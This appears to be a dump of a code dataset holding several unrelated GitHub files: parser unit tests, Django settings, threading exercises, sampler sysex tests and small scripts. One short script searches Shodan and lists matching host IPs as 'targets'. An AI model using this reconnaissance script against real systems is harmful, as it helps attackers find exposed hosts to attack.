envvar_set(\"FOO\", \"\", False)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n 
print(\"OK\")\n return\n\n def test_SetEnvironment_freefunc_envvar_op(self):\n \"\"\"\n Test the free-function ``envvar_op``\n \"\"\"\n print(\"\\n\")\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n with self.assertRaises(ValueError):\n envvar_op(\"non-existent-operation\", \"FOO\")\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_find_in_path(self):\n \"\"\"\n Test ``envvar_find_in_path``\n\n This test doesn't really validate any output -- it just runs a basic check.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 0\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of an application that is FOUND in the PATH.\")\n section = \"ENVVAR_FIND_IN_PATH_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"\")\n parser.apply(section)\n\n envvar_name = \"TEST_ENVVAR_PATH\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\"ls\" in os.environ[envvar_name], \"ls not found in path.\")\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of an application that is NOT FOUND in the PATH.\")\n envvar_name = \"TEST_ENVVAR_NOTFOUND\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\n os.environ[envvar_name] == \"\",\n \"Missing executable {} expected an empty-envvar\".format(envvar_name)\n )\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of app that IS IN PATH:\")\n print(\"- distutils.spawn.find_executable fails\")\n print(\"- shutil.which succeeds\")\n with patch(\n 'distutils.spawn.find_executable', side_effect=mock_distutils_spawn_find_executable_NotFound\n ):\n parser.apply(section)\n\n envvar_name = \"TEST_ENVVAR_PATH\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\"ls\" in os.environ[envvar_name], \"ls not found in path.\")\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of app that IS NOT IN PATH:\")\n print(\"- distutils.spawn.find_executable fails\")\n print(\"- shutil.which fails\")\n with patch(\n 'distutils.spawn.find_executable', side_effect=mock_distutils_spawn_find_executable_NotFound\n ):\n parser.apply(section)\n\n envvar_name = \"TEST_ENVVAR_NOTFOUND\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\n os.environ[envvar_name] == \"\",\n \"Missing executable {} expected an empty-envvar\".format(envvar_name)\n )\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n @patch('subprocess.run', side_effect=mock_run_status_ok)\n def test_SetEnvironment_module_load_default(self, 
arg_run):\n \"\"\"\n Tests loading a *default* module via ``module-load``, for\n example ``module-load gcc`` instead of ``module-load gcc : 7.3.0``.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"MODULE_LOAD_NO_VERSION\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data_expect_subset_01 = {'op': 'module_load', 'module': 'gcc', 'value': None}\n data_expect_subset_02 = {'op': 'module_load', 'module': 'boost', 'value': ''}\n\n data_actual = parser.parse_section(section)\n\n self.assertDictEqual(data_actual['setenvironment'][2], parser.actions[section][2])\n self.assertDictEqual(data_actual['setenvironment'][3], parser.actions[section][3])\n\n self.assertDictEqual(data_actual['setenvironment'][2], data_expect_subset_01)\n self.assertDictEqual(data_actual['setenvironment'][3], data_expect_subset_02)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"\")\n parser.apply(section)\n\n parser.pretty_print_envvars(envvar_filter=[\"TEST_SETENVIRONMENT_\"], filtered_keys_only=True)\n\n self.assertEqual(\"7.3.0\", os.environ[\"TEST_SETENVIRONMENT_GCC_VER\"])\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n # =================\n # H E L P E R S\n # =================\n\n def _helper_parse_section(self, section, actions_expect, rval_expect_cped):\n \"\"\"\n Generic helper routine to test various ways of parsing a section\n with verification that the results we get are expected.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment()\n parser.inifilepath = self._filename\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n ## parse section via configparserenhanceddata accessor\n print(\"Parse using configparserenhanceddata[{}]:\".format(section))\n rval_actual_cped = parser.configparserenhanceddata[section]\n parser.pretty_print_actions(section)\n actions_actual_cped = parser.actions[section]\n\n self.assertDictEqual(rval_expect_cped, rval_actual_cped)\n\n # Reset parser and parse section via parse_section\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n # Parse the section using `parse_section()`\n print(\"Parse using parse_section({}):\".format(section))\n rval_expect = {\"setenvironment\": actions_expect}\n rval_actual = parser.parse_section(section)\n actions_actual_ps = parser.actions[section]\n\n self.assertDictEqual(rval_expect, rval_actual)\n\n # Check results\n\n self.assertListEqual(actions_actual_cped, actions_actual_ps, \"Mismatch in result across methods.\")\n\n self.assertListEqual(\n actions_expect, actions_actual_cped, \"configparserenhanceddata[] results validation failed.\"\n )\n\n self.assertListEqual(actions_expect, actions_actual_ps, \"parse_section() results validation failed.\")\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def _helper_write_actions_to_file(self, options, gen_new_ground_truth=False):\n \"\"\"\n Set gen_new_ground_truth = True to create new ground-truth files.\n \"\"\"\n\n print(\"\\n\")\n print(\"-----[ TEST BEGIN 
]----------------------------------------\")\n print(\"options : {}\".format(options))\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n files_subdir = \"files\"\n\n filename_prefix = options[\"prefix\"]\n filename_interp = options[\"interpreter\"]\n filename_header = options[\"header\"]\n filename_body = options[\"body\"]\n filename_shebang = options[\"shebang\"]\n\n section = options[\"section\"]\n print(\"Section : {}\".format(section))\n\n filename_base = filename_prefix\n filename_ext = \"txt\"\n\n self.assertIn(filename_interp, [\"bash\", \"python\"])\n\n if filename_interp == \"bash\":\n filename_ext = \"sh\"\n elif filename_interp == \"python\":\n filename_ext = \"py\"\n\n filename_base += \"-{}\".format(filename_interp)\n\n if filename_header:\n filename_base += \"-inc_hdr\"\n else:\n filename_base += \"-exc_hdr\"\n\n if filename_body:\n filename_base += \"-inc_body\"\n else:\n filename_base += \"-exc_body\"\n\n if filename_shebang:\n filename_base += \"-inc_shbng\"\n else:\n filename_base += \"-exc_shbng\"\n\n filename_base += \".{}\".format(filename_ext)\n\n filename_base_truth = \"_\" + filename_base\n filename_base_test = \"___\" + filename_base\n\n # parse a section\n parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n filename_out_truth = os.path.sep.join([self.unit_test_path, files_subdir, filename_base_truth])\n filename_out_test = os.path.sep.join([self.unit_test_path, files_subdir, filename_base_test])\n\n rval_expect = 0\n rval_actual = parser.write_actions_to_file(\n filename_out_test,\n section,\n include_header=filename_header,\n include_body=filename_body,\n include_shebang=filename_shebang,\n interpreter=filename_interp\n )\n\n if gen_new_ground_truth:\n rval_actual = parser.write_actions_to_file(\n filename_out_truth,\n section,\n include_header=filename_header,\n include_body=filename_body,\n include_shebang=filename_shebang,\n interpreter=filename_interp\n )\n\n self.assertEqual(rval_expect, rval_actual)\n self.assertTrue(filecmp.cmp(filename_out_truth, filename_out_test))\n\n print(\"-----[ TEST END ]------------------------------------------\")\n return filename_out_test\n\n\n\n# EOF\n","repo_name":"sandialabs/ConfigParserEnhanced","sub_path":"wip/setenvironment/src/setenvironment/unittests/test_SetEnvironment.py","file_name":"test_SetEnvironment.py","file_ext":"py","file_size_in_byte":73423,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"74701727488","text":"n = int(input()) # How many students\r\nstudent_marks = {} #Dictonary to save the name and marks\r\nfor _ in range(n): #for iteration of taking inputs\r\n name, *line = input().split() #Splitting inputs in name and marks\r\n scores = list(map(float, line)) #scores are the float ones\r\n scores = sum(scores) / 3 #finding average\r\n student_marks[name] = scores #here name is the key to values of score\r\nquery_name = input() #Taking name for whose average you want to see\r\nprint('%.2f' % student_marks[query_name]) #%.2f tells that only go 2 decimals after the integer part\r\n#% student_marks[query_name] will give you the marks of entered query name (last marks that gets 
printed)\r\n","repo_name":"kvraiden/Simple-Python-Projects","sub_path":"percentage.py","file_name":"percentage.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74606468289","text":"from abc import ABC, abstractmethod\nimport json\nimport xml.etree.ElementTree as ET\nimport os\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass Strategy(ABC):\n @abstractmethod\n def open_file(self, file):\n pass\n\n def analyze_data(self, data: dict) -> str:\n result = ''\n for key, value in data['package'].items():\n result += f'{key} - {value}\\n'\n return result\n\n\nclass TxtStrategy(Strategy):\n def open_file(self, file) -> dict:\n data = {'package': {}}\n with open(file, 'r') as opened_file:\n for line in opened_file.readlines()[1:]:\n key, value = line.split(':')\n data['package'].update({key: value.strip()})\n data['package'].update({'origin': 'txt'})\n return data\n\n\nclass JsonStrategy(Strategy):\n def open_file(self, file) -> dict:\n with open(file, 'r') as opened_file:\n data = json.load(opened_file)\n data['package'].update({'origin': 'json'})\n return data\n\n\nclass XmlStrategy(Strategy):\n def open_file(self, file) -> dict:\n tree = ET.parse(file)\n root = tree.getroot()\n data = {'package': {}}\n for tag in list(root.iter())[1:]:\n data['package'].update({tag.tag: tag.text})\n data['package'].update({'origin': 'xml'})\n return data\n\n\nclass Context:\n def __init__(self, strategy: Strategy):\n self._strategy = strategy\n\n @property\n def strategy(self) -> Strategy:\n return self._strategy\n\n @strategy.setter\n def strategy(self, value: Strategy):\n self._strategy = value\n\n def get_data(self, file) -> str:\n raw_data = self._strategy.open_file(file)\n data = self._strategy.analyze_data(raw_data)\n return data\n\n\nif __name__ == '__main__':\n while True:\n file_type = input('Choose file type: ')\n if file_type == 'json':\n file_name = 'data.json'\n strategy = JsonStrategy()\n elif file_type == 'txt':\n file_name = 'data.txt'\n strategy = TxtStrategy()\n elif file_type == 'xml':\n file_name = 'data.xml'\n strategy = XmlStrategy()\n else:\n continue\n file_path = os.path.join(BASE_DIR, file_name)\n context = Context(strategy)\n print(context.get_data(file_path))\n","repo_name":"Chenger1/patterns","sub_path":"patterns/behaviour/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43797410881","text":"from .settings import *\nfrom .env_settings import SECRET_KEY\n\nDEBUG = False\n\nSTATIC_ROOT = '/code/static/'\n\nALLOWED_HOSTS = [\n 'delorean.fdesousa.fr'\n]\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'OPTIONS': {\n 'read_default_file': os.path.join(BASE_DIR, 'db.cnf'),\n 'init_command': 'SET default_storage_engine=INNODB'\n },\n }\n}\n\nINSTALLED_APPS.append('mod_wsgi.server')\n\nCORS_ORIGIN_ALLOW_ALL = False\n\nCORS_ORIGIN_WHITELIST = [\n 'alignment.fdesousa.fr' # Allow only the React frontend to send graphQL queries\n]\n","repo_name":"PhilippeFerreiraDeSousa/bitext-matching","sub_path":"back/bitext_matching/settings_prod.py","file_name":"settings_prod.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70099112131","text":"import threading\nimport time\n\n'''\nImplemented a bounded hash set with 
fixed size.\nAPIs:\n    add(val)\n    remove(val)\nDS:\n'''\nclass BHS_Semaphore:\n    def __init__(self, capacity):\n        self.hs = set() # hashset\n        self.sem = threading.Semaphore(capacity)\n        self.m = threading.RLock()\n\n    def add(self, val):\n        self.sem.acquire() \n        self.m.acquire()\n        if val in self.hs:\n            self.sem.release() \n        else:\n            self.hs.add(val)\n\n        self.m.release()\n\n    def remove(self, val):\n        self.m.acquire()\n        if val in self.hs:\n            self.hs.remove(val)\n            self.sem.release()\n        self.m.release()\n\n\nclass BHS_CV:\n    def __init__(self, capacity):  # fixed: 'self' parameter was missing\n        self.hs = set() # hashset\n        self.capacity = capacity  # fixed: capacity was never stored but is used in add()\n        self.m = threading.Lock()  # fixed: threading has no mutex(); Lock() is the primitive\n        self.cv_full = threading.Condition(self.m)\n        self.cv_empty = threading.Condition(self.m)\n\n    def add(self, val):  # fixed: 'self' parameter was missing\n        self.m.acquire()\n        while len(self.hs) >= self.capacity:\n            print (\"can not produce wait..\", val)\n            self.cv_full.wait()\n\n        self.hs.add(val)\n\n        self.cv_empty.notify()\n        self.m.release()\n\n    def remove(self, val):  # fixed: 'self' parameter was missing\n        self.m.acquire()\n        while len(self.hs) == 0:\n            self.cv_empty.wait()  # fixed: was the bare (undefined) name cv_empty\n\n        self.hs.remove(val)\n\n        self.cv_full.notify()\n        self.m.release()\n\ndef producer(bhs):\n    while True:\n        for val in [1,2,3,4,4,5,5,6,7,8,9,10]:\n            bhs.add(val)\n            print (\"producer\", bhs.hs)\n\ndef consumer(bhs):\n    while True:\n        for val in [1,2,3,4,4,5,5,6,7,8,9,10]:\n            bhs.remove(val)\n            print (\"consumer\", bhs.hs)\n            time.sleep(1)\n\nbhs = BHS_Semaphore(5)\nthread1 = threading.Thread(target=producer, args=(bhs,))\nthread2 = threading.Thread(target=consumer, args=(bhs,))\n\nthread1.start()\nthread2.start()\n\nthread1.join()\nthread2.join()\n\nprint (\"DONE\")\n","repo_name":"chandankmishra/lang","sub_path":"python/concurrency/q_bounded_hash_set/bounded_hash_set.py","file_name":"bounded_hash_set.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8176562684","text":"import struct, sys, unittest, logging, os\n\nfrom aksy.devices.akai import sysex, sysex_types, sampler, connector\nfrom aksy.devices.akai.z48 import sampler\n\nlog = logging.getLogger(\"aksy\")\nconn = connector.USBConnector('z48')\nz48 = sampler.Z48(conn)\n\nclass TestUserRef(unittest.TestCase):\n    def testEncodeDecode(self):\n        cmd = sysex.Command(sysex.Z48_ID, '\\x20\\x04', 'get_no_disks', (), (sysex_types.TYPEBYTE, sysex_types.BYTE,),\n                            userref_type=sysex_types.USERREF)\n        request = sysex.Request(cmd, (), 0)\n        bytes = z48._execute(request.get_bytes())\n        length, request_id = sysex_types.USERREF.decode(bytes[3:])\n\n        self.assertEquals(0, request_id)\n\n        cmd = sysex.Command(sysex.S56K_ID, '\\x10\\x04', 'get_no_disks', (), (sysex_types.BYTE,),\n                            userref_type=sysex_types.S56K_USERREF)\n        request = sysex.Request(cmd, (), 16000)\n\n        bytes = z48._execute(request.get_bytes())\n        length, request_id = sysex_types.USERREF.decode(bytes[3:])\n\n        self.assertEquals(3, length)\n        self.assertEquals(16000, request_id)\n\n        cmd = sysex.Command(sysex.Z48_ID, '\\x20\\x04', 'get_no_disks', (), (sysex_types.TYPEBYTE, sysex_types.BYTE,),\n                            userref_type=sysex_types.Z48USERREF)\n\n        request = sysex.Request(cmd, (), 126)\n        bytes = z48._execute(request.get_bytes())\n        result = sysex.Reply(bytes, cmd)\n        request_id = result.get_request_id()\n        self.assertEquals(126, request_id)\n\n        request = sysex.Request(cmd, (), 16000)\n        bytes = z48._execute(request.get_bytes())\n        result = sysex.Reply(bytes, cmd)\n        request_id = result.get_request_id()\n        self.assertEquals(16000, request_id)\n\ndef test_suite():\n    testloader = unittest.TestLoader()
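\n    # Added note: the dotted name below is resolved (importing the module) when\n    # the suite is built, so a parent runner can aggregate these functional tests.\n    return 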
testloader.loadTestsFromName('tests.aksy.devices.akai.z48.ftests.test_sysex')\n","repo_name":"watzo/aksy","sub_path":"src/tests/aksy/devices/akai/z48/ftests/test_sysex.py","file_name":"test_sysex.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"43"} +{"seq_id":"40546319830","text":"import torch\nimport numpy as np\n\nfrom PIL import Image\n\nimg_size = (256, 256)\nunet = torch.load('./weights/unet_epoch_51.pth')\n\nunet.eval()\n\n\nim = np.asarray(Image.open('data/JPEGImages/6.jpg').resize(img_size))\n\nim = im / 255.\nim = im.transpose(2, 0, 1)\nim = im[np.newaxis, :, :]\nim = im.astype('float32')\noutput = unet(torch.from_numpy(im)).detach().numpy()\n\noutput = np.squeeze(output)\noutput = np.where(output>0.5, 150, 0).astype(np.uint8)\nprint(output.shape, type(output))\nim = Image.fromarray(output)\nim.save('output.jpg')\n","repo_name":"syuu1987/geekTime-semantic-segmentation","sub_path":"predict_single.py","file_name":"predict_single.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"16272636857","text":"import pandas as pd\nfrom helpers import settings\nimport re\n\nclass Samples:\n '''\n Loads sample entries from CSV file into a pandas dataframe.\n Columns:\n domain = medicine\n heading = MEDICAL JURISPRUDENCE\n path = eb07/XML/m14/kp-eb0714-049001-6192-v1.xml\n '''\n\n def load(self):\n self.df = None\n path = settings.SAMPLES_PATH\n if path.exists():\n self.df = pd.read_csv(path)\n self.df = self.df.rename(columns={'entry term': 'heading'})\n self.df = self.df[self.df['heading'].notnull()]\n self.df['path'] = self.df['URI'].apply(lambda uri: re.sub(r'^.*/main/', '', uri))\n self.df['domain'] = self.df['domain'].apply(lambda domain: re.sub(r'\\W+', '_', domain.lower().strip()))\n\n def add_custom_samples(self):\n samples = pd.DataFrame(settings.CUSTOM_SAMPLES)\n self.df = pd.concat([self.df, samples], ignore_index=True)\n\n def get_all(self):\n return [row for i, row in self.df.iterrows()]\n\n @classmethod\n def read_all(cls):\n samples = cls()\n samples.load()\n samples.add_custom_samples()\n return samples.get_all()\n\n","repo_name":"kingsdigitallab/eb-pre","sub_path":"helpers/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73650752448","text":"from typing import List\n\nfrom django.utils import timezone\n\nfrom .. 
import models\n\n\"\"\"\nOut of date\n\"\"\"\n\n\ndef get_recurring_bill_today() -> List[models.Transaction]:\n    \"\"\"\n    For yearly bill, check if today is the month/day\n    For monthly bill, check if today is the x-th day\n    \"\"\"\n    # Get today's month and day\n    today = timezone.localdate()\n    month, day = today.month, today.day\n\n    bill_all = models.RecurringBill.objects.all()\n    bill_year = bill_all.filter(frequency='Y')\n    bill_month = bill_all.filter(frequency='M')\n\n    bill_today = []\n    # For yearly bill\n    bill_today += bill_year.filter(recurring_month=month, recurring_day=day)\n\n    # For monthly bill\n    bill_today += bill_month.filter(recurring_day=day)\n\n    return bill_today\n\n\ndef create_recurring_bill_today() -> None:\n    \"\"\"\n    Run each day at 5:00 am\n    \"\"\"\n    bills = get_recurring_bill_today()\n\n    # Create new instance for these bills\n    for bill in bills:\n        models.Transaction.objects.create(\n            amount=bill.amount,\n            category=bill.category,\n            company=bill.company,\n            card=bill.card,\n            creator=bill,\n            note=bill.note,\n            skip_summary_flag=bill.skip_summary_flag\n        )\n","repo_name":"asvrada/home-dashboard-backend","sub_path":"backend/crontab/recurring.py","file_name":"recurring.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34287378593","text":"from shodan import Shodan\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-q','--query',help=\"Search query\")\r\nparser.add_argument('-a','--api',help=\"Your API key\")\r\nparser = parser.parse_args()\r\n\r\ndef main():\r\n\tif parser.query:\r\n\t\t\r\n\t\tif parser.api:\r\n\t\t\t\r\n\t\t\tapi = Shodan(parser.api)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tb = api.search(parser.query)\r\n\t\t\t\tprint(\"Total targets: {}\".format(b['total']))\r\n\t\t\t\tfor i in b['matches']:\r\n\t\t\t\t\tprint(\"Target found: {}\".format(i['ip_str']))\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Error running the query\")\r\n\t\telse:\r\n\t\t\tprint(\"Enter your API key\")\r\n\r\n\telse:\r\n\t\tprint(\"Enter a search term\")\r\n\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tmain()\r\n\texcept KeyboardInterrupt:\r\n\t\texit()","repo_name":"Albertpilaestrada/Python-Hacking","sub_path":"shoodan3.py","file_name":"shoodan3.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19005943168","text":"class Solution:\n\n    def climbStairs(self, n: int) -> int:\n        return self.process(0, n, 0, {})\n\n    \n    def process(self, ci, n, ans, memo):\n        if ci == n:\n            return ans+1\n        if ci > n:\n            return ans\n        \n        currentKey = ci\n        if currentKey in memo:\n            return memo[currentKey]\n        \n        oneJump = self.process(ci+1, n, ans, memo)\n        twoJump = self.process(ci+2, n, ans, memo)\n        ans = oneJump + twoJump\n        memo[currentKey]=ans\n        return ans","repo_name":"brax-gunn/DSA_SWAGWALA_DEVELOPER","sub_path":"DYNAMIC PROGRAMMING/01_Climbing_Stairs.py","file_name":"01_Climbing_Stairs.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26084893278","text":"from Drone import Drone\n\n\nclass Leader(Drone):\n    def __init__(self, name, sim_object):\n        super().__init__(name, sim_object)  # fixed: super(Leader) created an unbound super object\n\n    def move_target(self, target_pose):\n        start_pose_target = self.get_position(self.target_object)\n        self.sim.moveToPose(-1, start_pose_target, [self.max_velocity], [self.max_acceleration], 
[self.max_jerking],\n target_pose,\n self.cb,\n self.target_object,\n [1, 1, 1, 0.1])\n","repo_name":"KetrinXD/HIVE-DL","sub_path":"classes/Leader.py","file_name":"Leader.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26886257729","text":"import smtplib\n\nuser = \"\"\npw = \"\"\nhost = \"email-smtp.us-west-2.amazonaws.com\"\nport = 587\nme = \"medusa@sebbqld.com\"\nyou = (\"christopher.vasiliou@schneider-electric.com\",)\nbody = \"The gorgon Medusa has risen!! \\n Stare into my eyes!\"\nmsg = (\"From: %s\\r\\nTo: %s\\r\\n\\r\\n\" % (me, \", \".join(you)))\nmsg = msg + body\ns = smtplib.SMTP(host, port, timeout = 10)\ns.starttls()\ns.login(user, pw)\ns.sendmail(me, you, msg)\ns.quit()\n","repo_name":"SEBA-Smart-Services/medusa-sbo","sub_path":"app/email/sendEmail.py","file_name":"sendEmail.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32117175326","text":"\"\"\"Tests for `cockpit.quantities.early_stopping`.\"\"\"\n\nimport pytest\n\nfrom backpack import extensions\nfrom cockpit.context import get_batch_size\nfrom cockpit.quantities import CABS\nfrom tests.test_quantities.utils import compare_quantities, get_output_sgd_test_runner\n\nTESTPROBLEMS = [\n \"quadratic_deep\",\n \"mnist_logreg\",\n # \"fmnist_2c2d\",\n \"mnist_mlp\",\n \"fmnist_logreg\",\n \"fmnist_mlp\",\n # \"mnist_2c2d\",\n \"cifar10_3c3d\",\n]\n\nTRACK_INTERVAL = 2\n\n\nclass CABSExpensive(CABS):\n \"\"\"CABS rule from individual gradients.\"\"\"\n\n def extensions(self, global_step):\n \"\"\"Return list of BackPACK extensions required for the computation.\n\n Args:\n global_step (int): The current iteration number.\n\n Returns:\n list: (Potentially empty) list with required BackPACK quantities.\n \"\"\"\n ext = []\n if self.is_active(global_step):\n ext.append(extensions.BatchGrad())\n\n return ext\n\n def _compute(self, global_step, params, batch_loss):\n \"\"\"Compute the CABS rule. Return suggested batch size.\n\n Evaluates Equ. 22 of\n\n - Balles, L., Romero, J., & Hennig, P.,\n Coupling adaptive batch sizes with learning rates (2017).\n \"\"\"\n B = get_batch_size(global_step)\n\n grad_squared = self._fetch_grad(params, aggregate=True) ** 2\n # # compensate BackPACK's 1/B scaling\n batch_grad_compensated = B * self._fetch_batch_grad(params, aggregate=True)\n\n sgs = (batch_grad_compensated ** 2).sum()\n ssg = grad_squared.sum()\n\n return self._lr * (sgs - B * ssg) / (B * batch_loss.item())\n\n\n@pytest.mark.parametrize(\"testproblem\", TESTPROBLEMS, ids=TESTPROBLEMS)\ndef test_integration(\n testproblem, num_epochs=1, batch_size=4, lr=0.01, momentum=0.0, seed=0\n):\n \"\"\"Integration test for early stopping quantity.\n\n Note: This test only verifies that the computation passes.\n \"\"\"\n quantities = [CABS(TRACK_INTERVAL, verbose=True)]\n\n return get_output_sgd_test_runner(\n quantities,\n testproblem,\n num_epochs=num_epochs,\n batch_size=batch_size,\n lr=lr,\n momentum=momentum,\n seed=seed,\n )[0]\n\n\n@pytest.mark.parametrize(\"testproblem\", TESTPROBLEMS, ids=TESTPROBLEMS)\ndef test_expensive_matches_separate_runs(\n testproblem, num_epochs=1, batch_size=4, lr=0.01, momentum=0.0, seed=0\n):\n \"\"\"Compare with expensive early stopping criterion. 
Perform two runs.\"\"\"\n quantity1 = CABS(TRACK_INTERVAL, verbose=True)\n quantity2 = CABSExpensive(TRACK_INTERVAL, verbose=True)\n\n compare_quantities(\n [quantity1, quantity2],\n testproblem,\n separate_runs=True,\n num_epochs=num_epochs,\n batch_size=batch_size,\n lr=lr,\n momentum=momentum,\n seed=seed,\n )\n\n\n@pytest.mark.parametrize(\"testproblem\", TESTPROBLEMS, ids=TESTPROBLEMS)\ndef test_expensive_matches_joint_runs(\n testproblem, num_epochs=1, batch_size=4, lr=0.01, momentum=0.0, seed=0\n):\n \"\"\"Compare with expensive early stopping criterion. Perform one run.\"\"\"\n quantities = [\n CABS(TRACK_INTERVAL, verbose=True),\n CABSExpensive(TRACK_INTERVAL, verbose=True),\n ]\n\n compare_quantities(\n quantities,\n testproblem,\n separate_runs=False,\n num_epochs=num_epochs,\n batch_size=batch_size,\n lr=lr,\n momentum=momentum,\n seed=seed,\n )\n","repo_name":"ahthie7u/cockpit","sub_path":"tests/test_quantities/test_cabs.py","file_name":"test_cabs.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"43"} +{"seq_id":"36232302275","text":"# 1. оформить функциями поиск в списке\n# имя, фамилия\n# возраст\n# количество музыкальных посещений\n# количество часов прибываня в центре\n# количество танцевальных посещений\n\npeoples_list = [['Степан Марков', 8, 12, 63, 10], ['Света Беляева', 7, 5, 56, 13], ['Наталья Петрова', 9, 6, 25, 16]]\nvisitors_list = [['Степан Марков', 8, 12, 63, 10], ['Света Беляева', 7, 5, 56, 13], ['Наталья Петрова', 9, 6, 25, 16]]\nprint(peoples_list)\n\n\n# поиск максимального количества часов посещений в списке\ndef find_max_visit(a):\n max_visit = 0\n for people in a:\n if people[3] > max_visit:\n max_visit = people[3]\n return max_visit\n\n# максимальное посещения тантев\ndef find_max_dance(a):\n max_dance = 0\n for people in a:\n if (people[4] > max_dance):\n max_dance = people[4]\n return max_dance\n\n\n# поиск минимального посещения танцев\ndef find_min_dance(a):\n min_dance = peoples_list[0][4]\n for people in a:\n if (people[4] < min_dance):\n min_dance = people[4]\n return min_dance\n\n\n\n# минимальный возраст\ndef find_min_age(z):\n min_age = 100\n for people in z:\n if (people[1] < min_age):\n min_age = people[1]\n return min_age\n\nx = find_max_visit(peoples_list)\nprint(\"максимальное количества часов посещений\",x)\n\nx = find_max_dance(peoples_list)\nprint('максимальное количество часов посещений танцев', x)\n\nx = find_min_dance(peoples_list)\nprint('минимальное посещения танцев', x)\n\nx = find_min_age(peoples_list)\nprint('минимальный возраст',x )","repo_name":"alexandrperm/python-task","sub_path":"задание 5.1.py","file_name":"задание 5.1.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14283914476","text":"__company__ = 'Boulder Environmental Sciences and Technology'\n__project__ = ''\n__author__ = 'Y. 
